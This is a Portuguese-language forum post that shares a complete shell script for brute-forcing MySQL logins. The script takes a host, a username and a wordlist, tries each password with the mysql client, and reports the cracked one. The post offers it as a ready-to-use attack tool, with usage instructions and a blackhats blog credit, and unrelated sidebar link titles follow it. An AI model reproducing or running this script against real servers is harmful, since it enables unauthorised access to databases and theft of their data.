MySQL brute-force
Publicado por Perfil removido (última atualização em 23/04/2013)
[ Hits: 6.226 ]
Script para fazer brute-force (através de word list) em MySQL.
#!/bin/sh
# Coder: MMxM
# Site: http://the-blackhats.blogspot.com
function brute(){
clear
echo -e "\n[+] Attacking: $1\n[*] User: $2\n"
sleep 1
lines=$(wc -l $3 | awk '{print $1}')
a=1
for i in `cat $3`
do
l=$(mysql -h $1 -u $2 -p"$i" -e "show databases;" 2> /dev/stdout)
if [ "$?" == "0" ]
then
echo -ne "\r[*] Password Cracked [$a/$lines]: $i\n[+] Password: $i\n"
break
else
echo -ne "\r[+] Trying [$a/$lines]: $i\r\r"
fi
a=$(($a+1))
done
echo -ne "\n[+] 100% complete\n\n"
}
if [ $# != 3 ]
then
cat << _banner
[+] ( Mysql Brute-force by MMxM )
[+] Usage: mysql.sh <host> <user> <wordlist>
_banner
exit
fi
which mysql > /dev/null
if [ "$?" != "0" ]
then
echo "[-] ERROR MYSQL CLIENT NOT FOUND"
exit
fi
brute $1 $2 $3
Script para sincronizar dados entre desktop e notebook de maneira 99% automática usando rsync
Implementando a famosa hélice ASCII
Instalando o REAPER no Ubuntu e Elementary OS
Cirurgia para acelerar o openSUSE em HD externo via USB
Void Server como Domain Control
Modo Simples de Baixar e Usar o bash-completion
Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante
Atualizar Linux Mint 22.2 para 22.3 beta
Jogar games da Battle.net no Linux com Faugus Launcher
Como fazer a Instalação de aplicativos para acesso remoto ao Linux
Conky, alerta de temperatura alta (10)
Assisti Avatar 3: Fogo e Cinzas (3)
Duas Pasta Pessoal Aparecendo no Ubuntu 24.04.3 LTS (42)









